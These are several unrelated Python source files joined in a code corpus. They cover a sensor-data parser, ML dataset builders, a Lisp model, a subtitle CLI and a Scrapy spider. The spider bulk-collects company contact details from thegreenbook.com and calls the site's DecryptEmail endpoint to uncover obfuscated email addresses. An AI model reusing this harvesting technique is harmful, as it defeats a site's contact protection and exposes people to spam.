out.append(self.encode(5, 3, [4, 7, 10], [op] + nums))
elif op == "LOAD":
out.append(self.encode(6, 3, [4, 7, 16], [op] + nums))
elif op == "LOADR":
out.append(self.encode(7, 3, [4, 7, 10], [op] + nums))
elif op == "STORE":
out.append(self.encode(8, 3, [4, 7, 16], [op] + nums))
elif op == "STORER":
out.append(self.encode(9, 3, [4, 7, 10], [op] + nums))
elif op == "JMP":
out.append(self.encode(10, 2, [4, 7], [op] + nums))
elif op == "JEQ":
out.append(self.encode(11, 2, [4, 7], [op] + nums))
elif op == "JNE":
out.append(self.encode(12, 2, [4, 7], [op] + nums))
elif op == "JLT":
out.append(self.encode(13, 2, [4, 7], [op] + nums))
elif op == "JGT":
out.append(self.encode(14, 2, [4, 7], [op] + nums))
elif op == "EXIT":
out.append(self.encode(15, 1, [4], [op] + nums))
if out[-1] == -1:
return []
if outfile != "":
with open(outfile, "w") as f:
f.writelines([str(format(x, '#06x'))[2:] + "\n" for x in out])
return out
| StarcoderdataPython |
5167811 | <filename>tests/pyccel/scripts/import_syntax/collisions4.py
# pylint: disable=missing-function-docstring, missing-module-docstring/
import user_mod
import user_mod2
test = user_mod.user_func(1.,2.,3.) + user_mod2.user_func(4.,5.)
print(test)
| StarcoderdataPython |
1703686 | <reponame>ayanezcasal/AntLibAYC<filename>libAnt/profiles/speed_cadence_profile.py
from libAnt.core import lazyproperty
from libAnt.profiles.profile import ProfileMessage
class SpeedAndCadenceProfileMessage(ProfileMessage):
""" Message from Speed & Cadence sensor """
def __init__(self, msg, previous):
super().__init__(msg, previous)
self.staleSpeedCounter = previous.staleSpeedCounter if previous is not None else 0
self.staleCadenceCounter = previous.staleCadenceCounter if previous is not None else 0
self.totalRevolutions = previous.totalRevolutions + self.cadenceRevCountDiff if previous is not None else 0
self.totalSpeedRevolutions = previous.totalSpeedRevolutions + self.speedRevCountDiff if previous is not None else 0
if self.previous is not None:
if self.speedEventTime == self.previous.speedEventTime:
self.staleSpeedCounter += 1
else:
self.staleSpeedCounter = 0
if self.cadenceEventTime == self.previous.cadenceEventTime:
self.staleCadenceCounter += 1
else:
self.staleCadenceCounter = 0
maxCadenceEventTime = 65536
maxSpeedEventTime = 65536
maxSpeedRevCount = 65536
maxCadenceRevCount = 65536
maxstaleSpeedCounter = 7
maxstaleCadenceCounter = 7
def __str__(self):
ret = '{} Speed: {:.2f}m/s (avg: {:.2f}m/s)\n'.format(super().__str__(), self.speed(2096),
self.averageSpeed(2096))
ret += '{} Cadence: {:.2f}rpm (avg: {:.2f}rpm)\n'.format(super().__str__(), self.cadence, self.averageCadence)
ret += '{} Total Distance: {:.2f}m\n'.format(super().__str__(), self.totalDistance(2096))
ret += '{} Total Revolutions: {:d}'.format(super().__str__(), self.totalRevolutions)
return ret
@lazyproperty
def cadenceEventTime(self):
""" Represents the time of the last valid bike cadence event (1/1024 sec) """
return (self.msg.content[1] << 8) | self.msg.content[0]
@lazyproperty
def cumulativeCadenceRevolutionCount(self):
""" Represents the total number of pedal revolutions """
return (self.msg.content[3] << 8) | self.msg.content[2]
@lazyproperty
def speedEventTime(self):
""" Represents the time of the last valid bike speed event (1/1024 sec) """
return (self.msg.content[5] << 8) | self.msg.content[4]
@lazyproperty
def cumulativeSpeedRevolutionCount(self):
""" Represents the total number of wheel revolutions """
return (self.msg.content[7] << 8) | self.msg.content[6]
@lazyproperty
def speedEventTimeDiff(self):
if self.previous is None:
return 0
elif self.speedEventTime < self.previous.speedEventTime:
# Rollover
return (self.speedEventTime - self.previous.speedEventTime) + self.maxSpeedEventTime
else:
return self.speedEventTime - self.previous.speedEventTime
@lazyproperty
def cadenceEventTimeDiff(self):
if self.previous is None:
return 0
elif self.cadenceEventTime < self.previous.cadenceEventTime:
# Rollover
return (self.cadenceEventTime - self.previous.cadenceEventTime) + self.maxCadenceEventTime
else:
return self.cadenceEventTime - self.previous.cadenceEventTime
@lazyproperty
def speedRevCountDiff(self):
if self.previous is None:
return 0
elif self.cumulativeSpeedRevolutionCount < self.previous.cumulativeSpeedRevolutionCount:
# Rollover
return (
self.cumulativeSpeedRevolutionCount - self.previous.cumulativeSpeedRevolutionCount) + self.maxSpeedRevCount
else:
return self.cumulativeSpeedRevolutionCount - self.previous.cumulativeSpeedRevolutionCount
@lazyproperty
def cadenceRevCountDiff(self):
if self.previous is None:
return 0
elif self.cumulativeCadenceRevolutionCount < self.previous.cumulativeCadenceRevolutionCount:
# Rollover
return (
self.cumulativeCadenceRevolutionCount - self.previous.cumulativeCadenceRevolutionCount) + self.maxCadenceRevCount
else:
return self.cumulativeCadenceRevolutionCount - self.previous.cumulativeCadenceRevolutionCount
def speed(self, c):
"""
:param c: circumference of the wheel (mm)
:return: The current speed (m/sec)
"""
if self.previous is None:
return 0
if self.speedEventTime == self.previous.speedEventTime:
if self.staleSpeedCounter > self.maxstaleSpeedCounter:
return 0
return self.previous.speed(c)
return self.speedRevCountDiff * 1.024 * c / self.speedEventTimeDiff
def distance(self, c):
"""
:param c: circumference of the wheel (mm)
:return: The distance since the last message (m)
"""
return self.speedRevCountDiff * c / 1000
def totalDistance(self, c):
"""
:param c: circumference of the wheel (mm)
:return: The total distance since the first message (m)
"""
return self.totalSpeedRevolutions * c / 1000
@lazyproperty
def cadence(self):
"""
:return: RPM
"""
if self.previous is None:
return 0
if self.cadenceEventTime == self.previous.cadenceEventTime:
if self.staleCadenceCounter > self.maxstaleCadenceCounter:
return 0
return self.previous.cadence
return self.cadenceRevCountDiff * 1024 * 60 / self.cadenceEventTimeDiff
@lazyproperty
def averageCadence(self):
"""
Returns the average cadence since the first message
:return: RPM
"""
if self.firstTimestamp == self.timestamp:
return self.cadence
return self.totalRevolutions * 60 / (self.timestamp - self.firstTimestamp)
def averageSpeed(self, c):
"""
Returns the average speed since the first message
:param c: circumference of the wheel (mm)
:return: m/s
"""
if self.firstTimestamp == self.timestamp:
return self.speed(c)
return self.totalDistance(c) / (self.timestamp - self.firstTimestamp)
| StarcoderdataPython |
6661737 | # -*- coding: utf-8 -*-
"""
cherry.performance
~~~~~~~~~~~~
This module implements the cherry performance.
:copyright: (c) 2018-2019 by <NAME>
:license: MIT License, see LICENSE for more details.
"""
import numpy as np
from sklearn.model_selection import KFold
from sklearn.pipeline import Pipeline
from sklearn import metrics
from .base import load_data, write_file, get_vectorizer, get_clf
from .trainer import Trainer
from .classifyer import Classify
from .exceptions import MethodNotFoundError
class Performance:
def __init__(self, model, **kwargs):
x_data = kwargs['x_data']
y_data = kwargs['y_data']
if not (x_data and y_data):
x_data, y_data = load_data(model)
vectorizer = kwargs['vectorizer']
vectorizer_method = kwargs['vectorizer_method']
clf = kwargs['clf']
clf_method = kwargs['clf_method']
if not vectorizer:
vectorizer = get_vectorizer(model, vectorizer_method)
if not clf:
clf = get_clf(model, clf_method)
n_splits = kwargs['n_splits']
output = kwargs['output']
for train_index, test_index in KFold(n_splits=n_splits, shuffle=True).split(x_data):
x_train, x_test = x_data[train_index], x_data[test_index]
y_train, y_test = y_data[train_index], y_data[test_index]
print('Calculating score')
self.score(vectorizer, clf, x_train, y_train, x_test, y_test, output)
def score(self, vectorizer, clf, x_train, y_train, x_test, y_test, output):
vectorizer = DEFAULT_VECTORIZER if not vectorizer else vectorizer
clf = DEFAULT_CLF if not clf else clf
text_clf = Pipeline([
('vectorizer', vectorizer),
('clf', clf)])
text_clf.fit(x_train, y_train)
predicted = text_clf.predict(x_test)
report = metrics.classification_report(y_test, predicted)
if output == 'Stdout':
print(report)
else:
self.write_file(output, report)
| StarcoderdataPython |
3582905 | <reponame>cnzakimuena/avRNS<gh_stars>0
"""
spec_gen constructs a labelled dataset of spectrogram images from spatial series obtained using MATLAB for use as input
to machine learning classification algorithms.
"""
from os.path import join as p_join
import scipy
import scipy.io as sio
from scipy import signal
from scipy.fft import fftshift
# from scipy.io import wavfile
import numpy as np
import pandas as pd
import librosa
from librosa import display
import matplotlib.pyplot as plt
from PIL import Image
import cv2
from sklearn.model_selection import train_test_split
# Assign group variables
def get_variables(data_path, group_var, d_name, cc_name, l_name):
data_dir_1 = p_join(data_path, group_var, 'stateFull_Data.mat').replace("\\", "/") # combine strings
data_dir_2 = p_join(data_path, group_var, 'stateFull_Data2.mat').replace("\\", "/")
data_1 = sio.loadmat(data_dir_1) # load .mat file
data_2 = sio.loadmat(data_dir_2)
rec_full_1 = data_1[d_name] # fetch variable inside .mat file
rec_full_2 = data_2[cc_name]
labels = data_1[l_name] # data_1 contains same labels as data_2
return rec_full_1, rec_full_2, labels
def spatial_series_plot(rec, sp_rate, t_var):
length_of_space = len(rec) / sp_rate
# print(length_of_space, " mm")
d = np.arange(0.0, rec.shape[0])/sampling_rate
fig, ax = plt.subplots()
ax.plot(d, rec, 'b-')
ax.set(xlabel='Distance [$mm$]', ylabel='Magnitude', title=t_var)
# ax.grid()
# fig.savefig("test.png")
plt.xlim(0, length_of_space)
return plt.show()
def spectrogram_plot(freq, space, s_im, rec, sp_rate):
length_of_space = len(rec) / sp_rate
# print(length_of_space, " mm")
plt.figure()
# c = plt.pcolormesh(space, freq, 10 * np.log10(s_im), cmap='viridis', shading='flat')
c = plt.pcolormesh(space, freq, 10 * np.log10(s_im), cmap='Greens', shading='gouraud')
cbar = plt.colorbar(c)
cbar.set_label('Power/Frequency [$dB/mm^{-1}$]')
# z is Power/Frequency (dB/Hz)
plt.ylabel('Frequency [$mm^{-1}$]')
plt.xlabel('Distance [$mm$]')
plt.xlim(0, length_of_space)
return plt.show()
def find_spec_bounds(rec_full, sp_rate):
for i in range(rec_full.shape[0]):
rec = rec_full[i, :] # single spatial series
# # Uncomment to visualize single spatial series
# spatial_series_plot(rec_1, sampling_rate, 'RPEb-BM Thickness')
# (1) Generate spectrogram from spatial series
# f, s, sxx = signal.spectrogram(rec, sp_rate, window='flattop', nperseg=40, noverlap=35, mode='psd')
f, s, sxx = signal.spectrogram(rec, sp_rate, window='flattop', nperseg=40, noverlap=35)
# Setting array zeros to min non-zero values to avoid log10(0) error
sxx[sxx == 0] = np.min(sxx[np.nonzero(sxx)])
spec = 10 * np.log10(sxx) # power spectral density
# # Uncomment to visualize spectrogram
# spectrogram_plot(f, s, sxx, rec, sp_rate)
# (2) Obtain normalization maximum and minimum values
curr_max = spec.max()
curr_min = spec.min()
if i == 0:
set_max = curr_max
set_min = curr_min
if curr_max > set_max:
set_max = curr_max
if curr_min < set_min:
set_min = curr_min
return set_max, set_min
def get_spec_im(rec, sp_rate, rec_max, rec_min):
# f, s, sxx = signal.spectrogram(rec, sp_rate, window='flattop', nperseg=40, noverlap=35, mode='psd')
f, s, sxx = signal.spectrogram(rec, sp_rate, window='flattop', nperseg=40, noverlap=35)
# Setting array zeros to min non-zero values to avoid log10(0) error
sxx[sxx == 0] = np.min(sxx[np.nonzero(sxx)])
# # Uncomment to visualize spectrogram
# spectrogram_plot(f, s, sxx, rec, sp_rate)
spec = 10 * np.log10(sxx) # power spectral density
# Normalize spectrogram images to 0-255 range (based on inter- G1 and G2 maximum)
spec = (spec - rec_min)/(rec_max-rec_min) # signed integers normalization to 0-1 range
spec *= 255.0/spec.max() # normalization to 0-255 range
# Resize images to 64x64
res = cv2.resize(spec, dsize=(64, 64), interpolation=cv2.INTER_CUBIC)
# print('Data Type: %s' % spec1.dtype)
# print('Min: %.3f, Max: %.3f' % (spec1.min(), spec1.max()))
# # Uncomment to visualize normalized drusen spectrogram image
# plt.figure()
# plt.imshow(res, cmap='Greens', vmin=0, vmax=255)
# plt.show()
res = res[..., np.newaxis] # add channel axis for concatenation
return res
def list_to_array(labels):
labels_lst = labels.tolist() # make labels array into list
labels_lst2 = [i[0] for i in labels_lst] # remove first square bracket around each elements
labels_lst3 = [i[0] for i in labels_lst2] # remove first square bracket around each elements
labels_arr = np.asarray(labels_lst3) # turn list back into array
labels_arr2 = labels_arr.reshape(labels_arr.shape[0], -1) # add dimension to array for concatenation
return labels_arr2
def get_x_array(rec_full_1, rec_full_2, sp_rate, set_max1, set_min1, set_max2, set_min2):
x_array = np.zeros((rec_full_1.shape[0], 64, 64, 2))
for q in range(rec_full_1.shape[0]):
rec1 = rec_full_1[q, :] # single drusen spatial series
rec2 = rec_full_2[q, :] # single cc spatial series
# (1) Generate current spectrogram images from drusen and cc spatial series
res_im1 = get_spec_im(rec1, sp_rate, set_max1, set_min1)
res_im2 = get_spec_im(rec2, sp_rate, set_max2, set_min2)
# (2) Concatenate drusen and cc spectrogram into 2-channels array of images
res_im = np.concatenate((res_im1, res_im2), axis=2)
# (3) Append current 2-channels array of images to x_array
x_array[q, :, :, :] = res_im
x_array = x_array.astype(np.uint8) # round array elements to nearest integer
return x_array
def get_y_array(labels_full):
y_array = np.zeros((1, labels_full.shape[0]))
counter = 0
lab_list = []
for i in range(labels_full.shape[0]):
if i == 0: # check if first iteration
label0 = labels_full[i, :]
y_array[:, i] = counter
lab_list.append(counter)
elif labels_full[i, :] == labels_full[i-1, :]: # check if current label matches previous label
y_array[:, i] = counter
else:
counter = counter + 1
y_array[:, i] = counter
lab_list.append(counter)
cl_array = np.asarray(lab_list)
y_array = y_array.astype(np.uint8) # round array elements to nearest integer
return y_array, cl_array
def split_dataset(x_array, y_array):
y_list = y_array.tolist()
y_list2 = y_list[0]
x_train_orig, x_test_orig, y_train_orig, y_test_orig = train_test_split(x_array, y_list2, test_size=0.20)
y_arr_train = np.asarray(y_train_orig)
y_train_orig = y_arr_train[np.newaxis, ...]
y_arr_test = np.asarray(y_test_orig)
y_test_orig = y_arr_test[np.newaxis, ...]
return x_train_orig, y_train_orig, x_test_orig, y_test_orig
def load_split_spec_dataset(subjects_g1, subjects_g2, str_data_path, spl_rate):
# 1) Extract out spatial series for drusen (recFull_GX_1) abd cc (recFull_GX_2) from reading MATLAB file
# 1.1) Assign AMD (group 1, G1) variables
rec_full_g1_1, rec_full_g1_2, labels_g1 = get_variables(str_data_path, subjects_g1, 'recFull_Array',
'recFull_Array2', 'stateFull_Labels')
# 1.2) Assign normal (group 2, G2) variables
rec_full_g2_1, rec_full_g2_2, labels_g2 = get_variables(str_data_path, subjects_g2, 'recFull_Array',
'recFull_Array2', 'stateFull_Labels')
# 2) Loops to generate ResNet_model X images input (number of images, row dim, col dim, channels depth)
# 2.1) Obtain drusen and cc spectrogram dataset boundaries for normalization
# combine G1 and G2 drusen series arrays
rec_full_1 = np.concatenate((rec_full_g1_1, rec_full_g2_1))
# find drusen dataset normalization max and min values
rec_max1, rec_min1 = find_spec_bounds(rec_full_1, spl_rate)
# combine G1 and G2 cc series arrays
rec_full_2 = np.concatenate((rec_full_g1_2, rec_full_g2_2))
# find cc dataset normalization max and min values
rec_max2, rec_min2 = find_spec_bounds(rec_full_2, spl_rate)
# 2.2) Loop to generate dataset of concatenated 64x64 drusen and cc spectrogram images
x_array = get_x_array(rec_full_1, rec_full_2, spl_rate, rec_max1, rec_min1, rec_max2, rec_min2)
# 3) Loop to generate ResNet_model Y labels and classes inputs
# 3.1) Turn label lists into arrays and concatenate
lab_arr_g1 = list_to_array(labels_g1)
lab_arr_g2 = list_to_array(labels_g2)
lab_full = np.concatenate((lab_arr_g1, lab_arr_g2), axis=0)
# 3.2) Turn labels array into numerical array and generate classes variable
y_array, cl_array = get_y_array(lab_full)
# 4) Select dataset split to recreate ResNet_model input
x_train_orig, y_train_orig, x_test_orig, y_test_orig = split_dataset(x_array, y_array)
return x_train_orig, y_train_orig, x_test_orig, y_test_orig, cl_array
def load_spec_dataset(subjects_g1, subjects_g2, str_data_path, spl_rate):
# 1) Extract out spatial series for drusen (recFull_GX_1) abd cc (recFull_GX_2) from reading MATLAB file
# 1.1) Assign AMD (group 1, G1) variables
rec_full_g1_1, rec_full_g1_2, labels_g1 = get_variables(str_data_path, subjects_g1, 'recFull_Array',
'recFull_Array2', 'stateFull_Labels')
# 1.2) Assign normal (group 2, G2) variables
rec_full_g2_1, rec_full_g2_2, labels_g2 = get_variables(str_data_path, subjects_g2, 'recFull_Array',
'recFull_Array2', 'stateFull_Labels')
# 2) Loops to generate ResNet_model X images input (number of images, row dim, col dim, channels depth)
# 2.1) Obtain drusen and cc spectrogram dataset boundaries for normalization
# combine G1 and G2 drusen series arrays
rec_full_1 = np.concatenate((rec_full_g1_1, rec_full_g2_1))
# find drusen dataset normalization max and min values
rec_max1, rec_min1 = find_spec_bounds(rec_full_1, spl_rate)
# combine G1 and G2 cc series arrays
rec_full_2 = np.concatenate((rec_full_g1_2, rec_full_g2_2))
# find cc dataset normalization max and min values
rec_max2, rec_min2 = find_spec_bounds(rec_full_2, spl_rate)
# 2.2) Loop to generate dataset of concatenated 64x64 drusen and cc spectrogram images
x_array = get_x_array(rec_full_1, rec_full_2, spl_rate, rec_max1, rec_min1, rec_max2, rec_min2)
# 3) Loop to generate ResNet_model Y labels and classes inputs
# 3.1) Turn label lists into arrays and concatenate
lab_arr_g1 = list_to_array(labels_g1)
lab_arr_g2 = list_to_array(labels_g2)
lab_full = np.concatenate((lab_arr_g1, lab_arr_g2), axis=0)
# 3.2) Turn labels array into numerical array and generate classes variable
y_array, cl_array = get_y_array(lab_full)
# # 4) Select dataset split to recreate ResNet_model input
# x_train_orig, y_train_orig, x_test_orig, y_test_orig = split_dataset(x_array, y_array)
return x_array, y_array, cl_array
def fft_plot(space_series, spl_rate):
n = len(space_series)
period = 1 / spl_rate
yf = scipy.fft.fft(space_series)
y = 2.0 / n * np.abs(yf[:n // 2])
x = np.linspace(0.0, 1.0 / (2.0 * period), int(n / 2))
fig, ax = plt.subplots()
ax.plot(x, 10 * np.log10(y))
plt.grid()
plt.xlabel('Frequency [$mm^{-1}$]')
plt.ylabel('Power/Frequency [$dB/mm^{-1}$]')
return plt.show()
subjects_G1 = "AMD"
subjects_G2 = "normal"
str_dataPath = r'C:/Users/cnzak/Desktop/data/avRNS/biophotonics'
# ML input data : 'drusenConverter' --> [stateFull_Data]; 'ccConverter' --> [stateFull_Data2]
sampling_rate = 200 # sampling frequency, 600/3 = 200 px/mm
# X_train_orig, Y_train_orig, X_test_orig, Y_test_orig, classes = load_split_spec_dataset(subjects_G1, subjects_G2,
# str_dataPath, sampling_rate)
X_orig, Y_orig, classes = load_spec_dataset(subjects_G1, subjects_G2, str_dataPath, sampling_rate)
| StarcoderdataPython |
3452631 | # scrapy crawl greenbook -s LOG_FILE=scrapy.log -o data.csv
import scrapy
class GreenbookSpider(scrapy.Spider):
name = 'greenbook'
start_urls = [
'http://www.thegreenbook.com/products/search/architect-builder-contractor-guides/'
]
def parse(self, response):
for href in response.xpath(
'//div[@id="div_Search_Results_Found"]/descendant-or-self::*/@href'
).extract():
yield scrapy.Request(
response.urljoin(href),
callback=self.parse_listing,
errback=self.errback,
meta={
'bigcat': response.url,
'page': 1
})
def parse_listing(self, response):
for href in response.xpath(
'//a[@itemprop="CompanyName"]/@href').extract():
yield scrapy.Request(
href,
callback=self.parse_company,
errback=self.errback,
meta={
'bigcat': response.meta['bigcat'],
'smallcat': response.url
})
if response.meta['page'] == 1:
category_url = response.url
else:
category_url = response.meta['category url']
if response.xpath('//div[@id="error404"]').extract_first() is None:
next_page = str(1 + int(response.meta['page']))
next_page_url = category_url + 'page/' + next_page + '/'
yield scrapy.Request(
next_page_url,
callback=self.parse_listing,
errback=self.errback,
meta={
'bigcat': response.meta['bigcat'],
'page': next_page,
'category url': category_url
})
def parse_company(self, response):
def extract_with_xpath(query):
return response.xpath(query).extract_first().strip()
if response.xpath('//div[@class="breadcrumb"]/h1/text()'
).extract_first() is not None:
coname = extract_with_xpath('//div[@class="breadcrumb"]/h1/text()')
else:
coname = ""
if response.xpath('//span[@class="phoneNum"]/text()').extract_first(
) is not None:
phone = response.xpath(
'//span[@class="phoneNum"]/text()').extract_first().strip()
else:
phone = ""
if response.xpath(
'//span[@class="faxNum"]/text()').extract_first() is not None:
fax = response.xpath(
'//span[@class="faxNum"]/text()').extract_first().strip()
else:
fax = ""
if response.xpath('//span[@itemprop="CompanyAddress"]/text()'
).extract_first() is not None:
coaddress = response.xpath(
'//span[@itemprop="CompanyAddress"]/text()').extract_first(
).strip()
else:
coaddress = ""
if response.xpath('//input[@id="hidCompEmail"]/@value').extract_first(
) is not None:
hidcompemail = response.xpath(
'//input[@id="hidCompEmail"]/@value').extract_first()
yield scrapy.Request(
'http://www.thegreenbook.com/companyprofile.aspx/DecryptEmail',
body="{sEmail: '" + hidcompemail + "'}",
method='POST',
headers={
'Content-Type': 'application/json',
},
callback=self.parse_w_email,
meta={
'HREF': response.url,
'CONAME': coname,
'PHONE': phone,
'FAX': fax,
'ADDRESS': coaddress,
'FAILMSG': '',
'BIGCAT': response.meta['bigcat'],
'SMALLCAT': response.meta['smallcat']
})
else:
yield {
'HREF': response.url,
'CONAME': coname,
'EMAIL': '',
'PHONE': phone,
'FAX': fax,
'ADDRESS': coaddress,
'FAILMSG': '',
'BIGCAT': response.meta['bigcat'],
'SMALLCAT': response.meta['smallcat']
}
def parse_w_email(self, response):
yield {
'HREF': response.meta['HREF'],
'CONAME': response.meta['CONAME'],
'EMAIL': response.body,
'PHONE': response.meta['PHONE'],
'FAX': response.meta['FAX'],
'ADDRESS': response.meta['ADDRESS'],
'FAILMSG': '',
'BIGCAT': response.meta['BIGCAT'],
'SMALLCAT': response.meta['SMALLCAT']
}
def errback(self, failure):
yield {
'HREF': failure.request.url,
'FAILMSG': repr(failure),
}
| StarcoderdataPython |
3357655 | <filename>compiler/eLisp/eLisp/model.py
#!/usr/bin/env python
# -*- encoding: utf-8 -*-
#
# Copyright (c) 2015 ASMlover. All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions
# are met:
#
# * Redistributions of source code must retain the above copyright
# notice, this list ofconditions and the following disclaimer.
#
# * Redistributions in binary form must reproduce the above copyright
# notice, this list of conditions and the following disclaimer in
# the documentation and/or other materialsprovided with the
# distribution.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
# "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
# LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS
# FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE
# COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT,
# INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING,
# BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES;
# LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER
# CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT
# LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN
# ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE
# POSSIBILITY OF SUCH DAMAGE.
class BaseType(object):
def __init__(self, val):
self.val = val
def __str__(self):
pass
def __eq__(self, other):
return isinstance(other, self.__class__) and self.val == other.val
def __lt__(self, other):
return isinstance(other, self.__class__) and self.val < other.val
def __ne__(self, other):
return not self.__eq__(other)
def __le__(self, other):
return self.__lt__(other) or self.__eq__(other)
def __gt__(self, other):
return not self.__le__(other)
def __ge__(self, other):
return not self.__lt__(other)
def __nonzero__(self):
return True
class Number(BaseType):
def __str__(self):
return str(self.val)
class Boolean(BaseType):
def __str__(self):
return '#t' if self.val else '#f'
def __nonzero__(self):
return self.val
class Character(BaseType):
def __str__(self):
return '#\\%s' % str(self.val)
class String(BaseType):
def __str__(self):
return '"%s"' % str(self.val)
class Symbol(BaseType):
def __str__(self):
return self.val
class EmptyList(object):
def __str__(self):
return '()'
def __eq__(self, other):
return isinstance(other, self.__class__)
def __nonzero__(self):
return True
EmptyList = EmptyList()
class Pair(object):
def __init__(self, head, tail):
self.head = head
self.tail = tail
def __str__(self):
return '(%s)' % self._write_pair(self)
@staticmethod
def _write_pair(pair):
head, tail = pair.head, pair.tail
output = str(head)
if isinstance(tail, pair):
output += ' %s' % Pair._write_pair(tail)
return output
if tail is EmptyList:
return output
output += ' . %s' % str(tail)
return output
| StarcoderdataPython |
1819726 | """
Module that contains the command line app.
Why does this file exist, and why not put this in __main__?
You might be tempted to import things from __main__ later, but that will
cause problems: the code will get executed twice:
- When you run `python -msmartass` python will execute
``__main__.py`` as a script. That means there won't be any
``smartass.__main__`` in ``sys.modules``.
- When you import __main__ it will get executed again (as a module) because
there's no ``smartass.__main__`` in ``sys.modules``.
Also see (1) from http://click.pocoo.org/5/setuptools/#setuptools-integration
"""
import logging
from functools import wraps
import click
import pkg_resources
from . import DumbProcessor, SmartProcessor
from .clickutils import ClickContextObj
from .fileutils import open_subfile, update_subfile
LOGGER = logging.getLogger(__name__)
def _common_cli(func):
default_log_level = logging.getLevelName(logging.INFO).lower()
@click.option('--log-level', type=click.Choice([
logging.getLevelName(lev).lower() for lev in [
logging.DEBUG, logging.INFO, logging.WARNING, logging.ERROR,
logging.CRITICAL]]),
default=default_log_level, show_default=True,
show_choices=True,
help='log level displayed')
@click.option(
"--no-backup/--backup", default=True, show_default=True,
help="enable/disable creation of backup files")
@click.option(
"--process-comments/--no-process-comments", default=False,
show_default=True,
help='enable/disable processing of comment events')
@click.option(
"--skip-name", multiple=True, default=[], metavar='ACTOR_NAME',
help=(
"lines by this actor (case insensitive) will be skipped. "
"May be passed multiple times."))
@click.version_option(
pkg_resources.get_distribution(__name__.split('.')[0]).version)
@click.argument(
'subfiles', nargs=-1, required=True, metavar='FILE',
type=click.Path(
exists=True, file_okay=True, dir_okay=False, writable=True))
@click.pass_context
@wraps(func)
def wrapper(ctx, log_level, *args, **kwargs):
obj = ctx.obj = ctx.obj or ClickContextObj()
level = getattr(logging, log_level.upper())
obj.log_level = level
return ctx.invoke(func, *args, **kwargs)
return wrapper
def _run_cli(processor_factory, backup, process_comments, skip_name, subfiles):
processor_args = dict(
process_comments=process_comments,
names_to_skip=skip_name)
processor = processor_factory(**processor_args)
for subfile in subfiles:
try:
(subdoc, encoding, newline) = open_subfile(subfile)
(total_events, events_processed,
events_updated) = processor.process_document(subdoc)
LOGGER.info('%s: events=%d, processed=%d, updated=%d',
subfile, total_events, events_processed,
events_updated)
if events_updated:
update_subfile(subfile, subdoc, encoding, newline, backup)
except RuntimeError as err:
LOGGER.error(
"%s: %s: %s",
subfile, type(err).__name__, str(err))
@click.command(no_args_is_help=True)
@_common_cli
def smartass(*args, **kwargs):
"""Smarten punctionation on ass subtitle files."""
_run_cli(SmartProcessor, *args, **kwargs)
@click.command(no_args_is_help=True)
@_common_cli
def dumbass(*args, **kwargs):
"""Unsmarten punctuation on ass subtitle files."""
_run_cli(DumbProcessor, *args, **kwargs)
| StarcoderdataPython |
1988210 | <gh_stars>100-1000
import os
import numpy as np
import scipy.io as sio
from PIL import Image
from deephar.data.datasets import get_clip_frame_index
from deephar.utils import *
ACTION_LABELS = None
def load_h36m_mat_annotation(filename):
mat = sio.loadmat(filename, struct_as_record=False, squeeze_me=True)
# Respect the order of TEST (0), TRAIN (1), and VALID (2)
sequences = [mat['sequences_te'], mat['sequences_tr'], mat['sequences_val']]
action_labels = mat['action_labels']
joint_labels = mat['joint_labels']
return sequences, action_labels, joint_labels
def serialize_index_sequences(seq):
frames_idx = []
for s in range(len(seq)):
for f in range(len(seq[s].frames)):
frames_idx.append((s, f))
return frames_idx
class Human36M(object):
"""Implementation of the Human3.6M dataset for 3D pose estimation and
action recognition.
"""
def __init__(self, dataset_path, dataconf, poselayout=pa17j3d,
topology='sequences', clip_size=16):
assert topology in ['sequences', 'frames'], \
'Invalid topology ({})'.format(topology)
self.dataset_path = dataset_path
self.dataconf = dataconf
self.poselayout = poselayout
self.topology = topology
self.clip_size = clip_size
self.load_annotations(os.path.join(dataset_path, 'annotations.mat'))
def load_annotations(self, filename):
try:
self.sequences, self.action_labels, self.joint_labels = \
load_h36m_mat_annotation(filename)
self.frame_idx = [serialize_index_sequences(self.sequences[0]),
serialize_index_sequences(self.sequences[1]),
serialize_index_sequences(self.sequences[2])]
global ACTION_LABELS
ACTION_LABELS = self.action_labels
except:
warning('Error loading Human3.6M dataset!')
raise
def get_data(self, key, mode, frame_list=None, fast_crop=False):
output = {}
if mode == TRAIN_MODE:
dconf = self.dataconf.random_data_generator()
random_clip = True
else:
dconf = self.dataconf.get_fixed_config()
random_clip = False
if self.topology == 'sequences':
seq = self.sequences[mode][key]
if frame_list == None:
frame_list = get_clip_frame_index(len(seq.frames),
dconf['subspl'], self.clip_size,
random_clip=random_clip)
objframes = seq.frames[frame_list]
else:
seq_idx, frame_idx = self.frame_idx[mode][key]
seq = self.sequences[mode][seq_idx]
objframes = seq.frames[[frame_idx]]
"""Build a Camera object"""
cpar = seq.camera_parameters
cam = Camera(cpar.R, cpar.T, cpar.f, cpar.c, cpar.p, cpar.k)
"""Load and project the poses"""
pose_w = self.load_pose_annot(objframes)
pose_uvd = cam.project(np.reshape(pose_w, (-1, 3)))
pose_uvd = np.reshape(pose_uvd,
(len(objframes), self.poselayout.num_joints, 3))
"""Compute GT bouding box."""
imgsize = (objframes[0].w, objframes[0].h)
objpos, winsize, zrange = get_crop_params(pose_uvd[:, 0, :],
imgsize, cam.f, dconf['scale'])
objpos += dconf['scale'] * np.array([dconf['transx'], dconf['transy']])
frames = np.empty((len(objframes),) + self.dataconf.input_shape)
pose = np.empty((len(objframes), self.poselayout.num_joints,
self.poselayout.dim))
for i in range(len(objframes)):
image = 'images/%s/%05d.jpg' % (seq.name, objframes[i].f)
imgt = T(Image.open(os.path.join(self.dataset_path, image)))
imgt.rotate_crop(dconf['angle'], objpos, winsize)
